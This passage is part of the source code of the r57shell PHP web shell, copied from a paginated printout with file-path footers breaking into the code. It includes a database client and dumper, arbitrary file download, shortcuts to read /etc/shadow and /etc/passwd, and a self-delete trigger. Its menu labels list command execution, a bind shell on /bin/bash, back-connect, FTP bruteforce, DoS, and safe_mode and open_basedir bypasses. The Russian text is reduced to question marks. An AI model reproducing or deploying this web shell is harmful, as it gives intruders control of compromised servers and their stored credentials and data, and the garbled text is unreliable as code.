  24. 24. while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case MySQLi: $this->num_rows=@mysqli_num_rows($this->res); $this->num_fields=@mysqli_num_fields($this->res); while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res))); @mysqli_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case mSQL: $this->num_rows=@msql_num_rows($this->res); $this->num_fields=@msql_num_fields($this->res); while(false !== ($this->rows[] = @msql_fetch_array($this->res))); @msql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case SQLite: $this->num_rows=@sqlite_num_rows($this->res); $this->num_fields=@sqlite_num_fields($this->res); while(false !== ($this->rows[] = @sqlite_fetch_array($this->res))); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; }file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  25. 25. function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = ##; $this->dump[1] = ## --------------------------------------- ; $this->dump[2] = ## Created: .date ("d/m/Y H:i:s"); $this->dump[3] = ## Database: .$this->base; $this->dump[4] = ## Table: .$table; $this->dump[5] = ## --------------------------------------- ; switch($this->db) { case MySQL: $this->dump[0] = ## MySQL dump; if($this->query(/*.chr(0).*/ SHOW CREATE TABLE `.$table.`)!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0][Create Table]; $this->dump[] = ## --------------------------------------- ; if($this->query(/*.chr(0).*/ SELECT * FROM `.$table.`)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = INSERT INTO `.$table.` (`.@implode("`, `", $this->columns).`) VALUES (.@implode(", ", $this->rows[$i]).);; } break;file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  26. 26. case MSSQL: $this->dump[0] = ## MSSQL dump; if($this->query(SELECT * FROM .$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = INSERT INTO .$table. (.@implode(", ", $this->columns).) VALUES (.@implode(", ", $this- >rows[$i]).);; } break; case PostgreSQL: $this->dump[0] = ## PostgreSQL dump; if($this->query(SELECT * FROM .$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = INSERT INTO .$table. (.@implode(", ", $this->columns).) VALUES (.@implode(", ", $this- >rows[$i]).);; } break; case Oracle: $this->dump[0] = ## ORACLE dump; if($this->query(SELECT * FROM .$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) {file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  27. 27. foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = INSERT INTO .$table. (.@implode(", ", $this->columns).) VALUES (.@implode(", ", $this- >rows[$i]).);; } break; case MySQLi: $this->dump[0] = ## MySQLi dump; if($this->query(SELECT * FROM .$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);} $this->dump[] = INSERT INTO .$table. (.@implode(", ", $this->columns).) VALUES (.@implode(", ", $this- >rows[$i]).);; } break; case mSQL: $this->dump[0] = ## mSQL dump; if($this->query(SELECT * FROM .$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = INSERT INTO .$table. (.@implode(", ", $this->columns).) VALUES (.@implode(", ", $this- >rows[$i]).);; } break; case SQLite: $this->dump[0] = ## SQLite dump;file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  28. 28. if($this->query(SELECT * FROM .$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = INSERT INTO .$table. (.@implode(", ", $this->columns).) VALUES (.@implode(", ", $this- >rows[$i]).);; } break; default: return 0; break; } return 1; } function close() { switch($this->db) { case MySQL: @mysql_close($this->connection); break; case MSSQL: @mssql_close($this->connection); break; case PostgreSQL: @pg_close($this->connection);file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  29. 29. break; case Oracle: @oci_close($this->connection); break; case MySQLi: @mysqli_close($this->connection); break; case mSQL: @msql_close($this->connection); break; case SQLite: @sqlite_close($this->connection); break; } } function affected_rows() { switch($this->db) { case MySQL: return @mysql_affected_rows($this->res); break; case MSSQL: return @mssql_affected_rows($this->res); break; case PostgreSQL: return @pg_affected_rows($this->res);file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  30. 30. break; case Oracle: return @ocirowcount($this->res); break; case MySQLi: return @mysqli_affected_rows($this->res); break; case mSQL: return @msql_affected_rows($this->res); break; case SQLite: return @sqlite_changes($this->res); break; default: return 0; break; } } } if(isset($_POST[cmd]) && $_POST[cmd]=="download_file" && !empty($_POST[d_name])) { if($file=moreread($_POST[d_name])){ $filedump = $file; } else if ($file=readzlib($_POST[d_name])) { $filedump = $file; } else { err(1,$_POST[d_name]); $_POST[cmd]=""; } if(!empty($_POST[cmd])) { @ob_clean(); $filename = @basename($_POST[d_name]);file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  31. 31. $content_encoding=$mime_type=; compress($filename,$filedump,$_POST[compress]); if (!empty($content_encoding)) { header(Content-Encoding: . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename="".$filename."";"); echo $filedump; exit(); } } if(isset($_GET[1])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } if (isset($_POST[cmd]) && $_POST[cmd]=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST[db]; $sql->host = $_POST[db_server]; $sql->port = $_POST[db_port]; $sql->user = $_POST[mysql_l]; $sql->pass = $_POST[mysql_p]; $sql->base = $_POST[mysql_db]; $querys = @explode(;,$_POST[db_query]); echo <body bgcolor=#e4e0d8>; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Cant connect to SQL server</b></font></div>"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  32. 32. color=red><b>Cant select database</b></font></div>"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query)) { case 0: echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql- >error."</b></font></td></tr></table>"; break; case 1: if($sql->get_result()) { echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo <tr><td><font face=Verdana size=-2>&nbsp;.$values.&nbsp;</font></td></tr>; }file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  33. 33. echo "</table>"; } break; case 2: $ar = $sql->affected_rows()?($sql->affected_rows()):(0); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; } } } } } echo "<br><form name=form method=POST>"; echo in(hidden,db,0,$_POST[db]); echo in(hidden,db_server,0,$_POST[db_server]); echo in(hidden,db_port,0,$_POST[db_port]); echo in(hidden,mysql_l,0,$_POST[mysql_l]); echo in(hidden,mysql_p,0,$_POST[mysql_p]); echo in(hidden,mysql_db,0,$_POST[mysql_db]); echo in(hidden,cmd,0,db_query); echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value="".$sql- >base.""></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST[db_query])?($_POST[db_query]):("SHOW DATABASES;nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=" Run SQL query "></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a>file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  34. 34. ]</b></font></div>"; die(); } if(isset($_GET[12])) { @unlink(__FILE__); } if(isset($_GET[11])) { @unlink($tempdir.bdpl); @unlink($tempdir.back); @unlink($tempdir.bd); @unlink($tempdir.bd.c); @unlink($tempdir.dp); @unlink($tempdir.dpc); @unlink($tempdir.dpc.c); @unlink($tempdir.prxpl); @unlink($tempdir.grep.txt); } if(isset($_GET[2])) { echo $head; function U_value($value) { if ($value == ) return <i>no value</i>; if (@is_bool($value)) return $value ? TRUE : FALSE; if ($value === null) return NULL; if (@is_object($value)) $value = (array) $value;file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  35. 35. if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, <wbr />, true); return @preg_replace(!(&[^;]*)<wbr />([^;]*;)!, $1$2<wbr />, $str); } if (@function_exists(ini_get_all)) { $r = ; echo <table width=100%>, <tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>; foreach (@ini_get_all() as $key=>$value) { $r .= <tr><td>.ws(3).<font face=Verdana size=-2><b>.$key.</b></font></td><td><font face=Verdana size=- 2><div align=center><b>.U_value($value[local_value]).</b></div></font></td><td><font face=Verdana size=- 2><div align=center><b>.U_value($value[global_value]).</b></div></font></td></tr>; } echo $r; echo </table>; }file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  36. 36. echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET[3])) { echo $head; echo <table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= <tr><td>.ws(3).<font face=Verdana size=-2><b>.trim($info[0]).</b></font></td><td><font face=Verdana size=-2><div align=center><b>.trim($info[1]).</b></div></font></td></tr>; } echo $r; } else { echo <tr><td>.ws(3).<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>; } echo </table>; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>";file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  37. 37. die(); } if(isset($_GET[4])) { echo $head; echo <table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= <tr><td>.ws(3).<font face=Verdana size=-2><b>.trim($info[0]).</b></font></td><td><font face=Verdana size=-2><div align=center><b>.trim($info[1]).</b></div></font></td></tr>; } echo $r; } else { echo <tr><td>.ws(3).<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>; } echo </table>; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die();file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  38. 38. } if(isset($_GET[5])) {$_POST[cmd] = systeminfo;} if(isset($_GET[6])) {$_POST[cmd]=edit_file;$_POST[e_name] = /etc/syslog.conf;} if(isset($_GET[7])) {$_POST[cmd]=edit_file;$_POST[e_name] = /etc/resolv.conf;} if(isset($_GET[8])) {$_POST[cmd]=edit_file;$_POST[e_name] = /etc/hosts;} if(isset($_GET[9])) {$_POST[cmd]=edit_file;$_POST[e_name] = /etc/shadow;} if(isset($_GET[10])) {$_POST[cmd]=edit_file;$_POST[e_name] = /etc/passwd;} if(isset($_GET[13])) {$_POST[cmd]=cat /proc/cpuinfo;} if(isset($_GET[14])) {$_POST[cmd]=cat /proc/version;} if(isset($_GET[15])) {$_POST[cmd] = free;} if(isset($_GET[16])) {$_POST[cmd] = dmesg(8);} if(isset($_GET[17])) {$_POST[cmd] = vmstat;} if(isset($_GET[18])) {$_POST[cmd] = lspci;} if(isset($_GET[19]))file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  39. 39. {$_POST[cmd] = lsdev;} if(isset($_GET[20])) {$_POST[cmd]=cat /proc/interrupts;} if(isset($_GET[21])) {$_POST[cmd] = cat /etc/*realise;} if(isset($_GET[22])) {$_POST[cmd]=edit_file;$_POST[e_name] = /etc/issue.net;} if(isset($_GET[23])) {$_POST[cmd] = lsattr -va;} if(isset($_GET[24])) {$_POST[cmd] = w;} if(isset($_GET[25])) {$_POST[cmd] = who;} if(isset($_GET[26])) {$_POST[cmd] = uptime;} if(isset($_GET[27])) {$_POST[cmd] = last -n 10;} if(isset($_GET[28])) {$_POST[cmd] = ps -aux;} if(isset($_GET[29])) {$_POST[cmd] = service --status-all;} if(isset($_GET[30])) {$_POST[cmd] = ifconfig;} if(isset($_GET[31])) {$_POST[cmd] = netstat -a;} if(isset($_GET[32])) {$_POST[cmd]=edit_file;$_POST[e_name] = /etc/fstab;}file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  40. 40. if(isset($_GET[33])) {$_POST[cmd] = fdisk -l;} if(isset($_GET[34])) {$_POST[cmd] = df -h;} #if(isset($_GET[])) # {$_POST[cmd] = ;} $lang=array( ru_butt1 =>?????????, ru_butt2 =>?????????, ru_butt3 =>???????, ru_butt4 =>?????????, ru_butt5 =>?????????, ru_butt6 =>???????, ru_butt7 =>???????, ru_butt8 =>?????????, ru_butt9 =>????, ru_butt10=>?????????, ru_butt11=>?????????????, ru_butt12=>?????, ru_butt13=>???????/???????, ru_butt14=>???????, ru_butt15=>?????????, ru_text1 =>??????????? ???????, ru_text2 =>?????????? ?????? ?? ???????, ru_text3 =>????????? ???????,file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  41. 41. ru_text4 =>??????? ??????????, ru_text5 =>???????? ?????? ?? ??????, ru_text6 =>????????? ????, ru_text7 =>??????, ru_text8 =>???????? ?????, ru_text9 =>???????? ????? ? ???????? ??? ? /bin/bash, ru_text10=>??????? ????, ru_text11=>?????? ??? ???????, ru_text12=>back-connect, ru_text13=>IP-?????, ru_text14=>????, ru_text15=>???????? ?????? ? ?????????? ???????, ru_text16=>????????????, ru_text17=>????????? ????, ru_text18=>????????? ????, ru_text19=>Exploits, ru_text20=>????????????, ru_text21=>????? ???, ru_text22=>datapipe, ru_text23=>????????? ????, ru_text24=>????????? ????, ru_text25=>????????? ????, ru_text26=>????????????, ru_text28=>?????? ? safe_mode, ru_text29=>?????? ????????, ru_text30=>???????? ?????, ru_text31=>???? ?? ??????,file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  42. 42. ru_text32=>?????????? PHP ????, ru_text33=>???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL (PHP <= 4.4.2, 5.1.4), ru_text34=>???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include, ru_text35=>???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql, ru_text36=>???? . ???????, ru_text37=>?????, ru_text38=>??????, ru_text39=>????, ru_text40=>???? ??????? ???? ??????, ru_text41=>????????? ? ?????, ru_text42=>?????????????? ?????, ru_text43=>????????????? ????, ru_text44=>?????????????? ????? ??????????! ?????? ?????? ??? ??????!, ru_text45=>???? ????????, ru_text46=>???????? phpinfo(), ru_text47=>???????? ???????? php.ini, ru_text48=>???????? ????????? ??????, ru_text49=>???????? ??????? ? ???????, ru_text50=>?????????? ? ??????????, ru_text51=>?????????? ? ??????, ru_text52=>????? ??? ??????, ru_text53=>?????? ? ?????, ru_text54=>????? ?????? ? ??????, ru_text55=>?????? ? ??????, ru_text56=>?????? ?? ???????, ru_text57=>???????/??????? ????/??????????, ru_text58=>???,file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  43. 43. ru_text59=>????, ru_text60=>??????????, ru_text61=>???? ??????, ru_text62=>?????????? ???????, ru_text63=>???? ??????, ru_text64=>?????????? ???????, ru_text65=>???????, ru_text66=>???????, ru_text67=>Chown/Chgrp/Chmod, ru_text68=>???????, ru_text69=>????????1, ru_text70=>????????2, ru_text71=>"?????? ???????? ???????:rn- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) rn- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) rn- ??? ??????? CHMOD - ????? ????? ? ???????????? ?? ??????????? (???????? 0777)", ru_text72=>????? ??? ??????, ru_text73=>?????? ? ?????, ru_text74=>?????? ? ??????, ru_text75=>* ????? ???????????? ?????????? ?????????, ru_text76=>????? ?????? ? ?????? ? ??????? ??????? find, ru_text80=>???, ru_text81=>????, ru_text82=>???? ??????, ru_text83=>?????????? SQL ???????, ru_text84=>SQL ??????, ru_text85=>???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ??????? , ru_text86=>?????????? ????? ? ???????,file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  44. 44. ru_text87=>?????????? ?????? ? ?????????? ftp-???????, ru_text88=>??????:????, ru_text89=>???? ?? ftp ???????, ru_text90=>????? ????????, ru_text91=>???????????? ?, ru_text92=>??? ?????., ru_text93=>FTP, ru_text94=>FTP-????????, ru_text95=>?????? ?????????????, ru_text96=>?? ??????? ???????? ?????? ?????????????, ru_text97=>????????? ??????????: , ru_text98=>??????? ???????????: , ru_text99=>/etc/passwd, ru_text100=>???????? ?????? ?? ????????? ??? ??????, ru_text101=>???????????? (user -> resu), ru_text102=>?????, ru_text103=>???????? ??????, ru_text104=>???????? ????? ?? ???????? ????, ru_text105=>????, ru_text106=>??, ru_text107=>????, ru_text108=>????? ??????, ru_text109=>????????, ru_text110=>??????????, ru_text111=>SQL-?????? : ????, ru_text112=>???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail() (PHP <= 4.0-4.2.2, 5.x), ru_text113=>???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ???????file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  45. 45. ??????? imap_list() (PHP <= 5.1.2), ru_text114=>???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ????????? ????? imap_body() (PHP <= 5.1.2), ru_text115=>???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? [compress.zlib://] (PHP <= 4.4.2, 5.1.2), ru_text116=>?????????? ????, ru_text117=>?, ru_text118=>???? ??????????, ru_text119=>?? ??????? ??????????? ????, ru_text120=>???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ????????? ????? ini_restore() (PHP <= 4.4.4, 5.1.6) by NST, ru_text121=>???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ????? ????????? fopen() (PHP v4.4.0 memory leak) by NST, ru_text122=>???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ????? ????????? glob() (PHP <= 5.2.x), ru_text123=>???????? ??????????? ?????? ??????????? open_basedir, ?????? *.bzip ?????? [compress.bzip2://] (PHP <= 5.2.1), ru_text124=>???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? error_log(php://) (PHP <= 5.1.4, 4.4.2), ru_text125=>??????, ru_text126=>???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ??????? [NULL-byte] (PHP <= 5.2.0), ru_text127=>???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? readfile(php://) (PHP <= 5.2.1, 4.4.4), ru_text128=>???? ?????????/??????? ????? (touch), ru_text129=>???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ? fopen(srpath://) (PHP v5.2.0), ru_text130=>???????? ??????????? ?????? ??????????? open_basedir, ?????? *.zip ?????? [zip://] (PHP <= 5.2.1), ru_text131=>???????? ??????????? ?????? ??????????? open_basedir, ???????? ??????????? ????? ? ??????? ??????? symlink() (PHP <= 5.2.1), ru_text132=>???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ????? ????????? symlink() (PHP <= 5.2.1), ru_text133=>???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ???????file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  46. 46. (TMPDIR) (PHP <= 5.2.4), ru_text134=>???????? ??? ??????, ru_text135=>???????, ru_text136=>???????? ?????????? ??????, ru_text137=>????????, ru_text138=>???????, ru_text139=>????-??????, ru_text140=>DoS, ru_text141=>?????????! ???????? ???? ???-???????., ru_text142=>????????? ???????, ru_text143=>Temp: , ru_text144=>Test bypass safe_mode with load file in mysqli, ru_text145=>???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ????? ????????? realpath() (PHP <= 5.2.4), ru_text146=>MAX ???-?? ????????, ru_text147=>, ru_text148=>, ru_text149=>, ru_text150=>, ru_err0=>??????! ?? ???? ???????? ? ???? , ru_err1=>??????! ?? ???? ????????? ???? , ru_err2=>??????! ?? ??????? ??????? , ru_err3=>??????! ?? ??????? ???????????? ? ftp ???????, ru_err4=>?????? ??????????? ?? ftp ???????, ru_err5=>??????! ?? ??????? ???????? ?????????? ?? ftp ???????, ru_err6=>??????! ?? ??????? ????????? ??????, ru_err7=>?????? ??????????, /* --------------------------------------------------------------- */file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  47. 47. eng_butt1 =>Execute, eng_butt2 =>Upload, eng_butt3 =>Bind, eng_butt4 =>Connect, eng_butt5 =>Run, eng_butt6 =>Change, eng_butt7 =>Show, eng_butt8 =>Test, eng_butt9 =>Dump, eng_butt10=>Save, eng_butt11=>Edit file, eng_butt12=>Find, eng_butt13=>Create/Delete, eng_butt14=>Download, eng_butt15=>Send, eng_text1 =>Executed command, eng_text2 =>Execute command on server, eng_text3 =>Run command, eng_text4 =>Work directory, eng_text5 =>Upload files on server, eng_text6 =>Local file, eng_text7 =>Aliases, eng_text8 =>Select alias, eng_text9 =>Bind port to /bin/bash, eng_text10=>Port, eng_text11=>Password for access, eng_text12=>back-connect,file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  48. 48. eng_text13=>IP, eng_text14=>Port, eng_text15=>Upload files from remote server, eng_text16=>With, eng_text17=>Remote file, eng_text18=>Local file, eng_text19=>Exploits, eng_text20=>Use, eng_text21=>&nbsp;New name, eng_text22=>datapipe, eng_text23=>Local port, eng_text24=>Remote host, eng_text25=>Remote port, eng_text26=>Use, eng_text28=>Work in safe_mode, eng_text29=>ACCESS DENIED, eng_text30=>Cat file, eng_text31=>File not found, eng_text32=>Eval PHP code, eng_text33=>Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4), eng_text34=>Test bypass safe_mode with include function, eng_text35=>Test bypass safe_mode with load file in mysql, eng_text36=>Database . Table, eng_text37=>Login, eng_text38=>Password, eng_text39=>Database, eng_text40=>Dump database table,file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  49. 49. eng_text41=>Save dump in file, eng_text42=>Edit files, eng_text43=>File for edit, eng_text44=>Cant edit file! Only read access!, eng_text45=>File saved, eng_text46=>Show phpinfo(), eng_text47=>Show variables from php.ini, eng_text48=>Delete temp files, eng_text49=>Delete script from server, eng_text50=>View cpu info, eng_text51=>View memory info, eng_text52=>Find text, eng_text53=>In dirs, eng_text54=>Find text in files, eng_text55=>Only in files, eng_text56=>Nothing :(, eng_text57=>Create/Delete File/Dir, eng_text58=>name, eng_text59=>file, eng_text60=>dir, eng_text61=>File created, eng_text62=>Dir created, eng_text63=>File deleted, eng_text64=>Dir deleted, eng_text65=>Create, eng_text66=>Delete, eng_text67=>Chown/Chgrp/Chmod,file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  50. 50. eng_text68=>Command, eng_text69=>param1, eng_text70=>param2, eng_text71=>"Second commands param is:rn- for CHOWN - name of new owner or UIDrn- for CHGRP - group name or GIDrn- for CHMOD - 0777, 0755...", eng_text72=>Text for find, eng_text73=>Find in folder, eng_text74=>Find in files, eng_text75=>* you can use regexp, eng_text76=>Search text in files via find, eng_text80=>Type, eng_text81=>Net, eng_text82=>Databases, eng_text83=>Run SQL query, eng_text84=>SQL query, eng_text85=>Test bypass safe_mode with commands execute via MSSQL server, eng_text86=>Download files from server, eng_text87=>Download files from remote ftp-server, eng_text88=>server:port, eng_text89=>File on ftp, eng_text90=>Transfer mode, eng_text91=>Archivation, eng_text92=>without arch., eng_text93=>FTP, eng_text94=>FTP-bruteforce, eng_text95=>Users list, eng_text96=>Cant get users list,file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
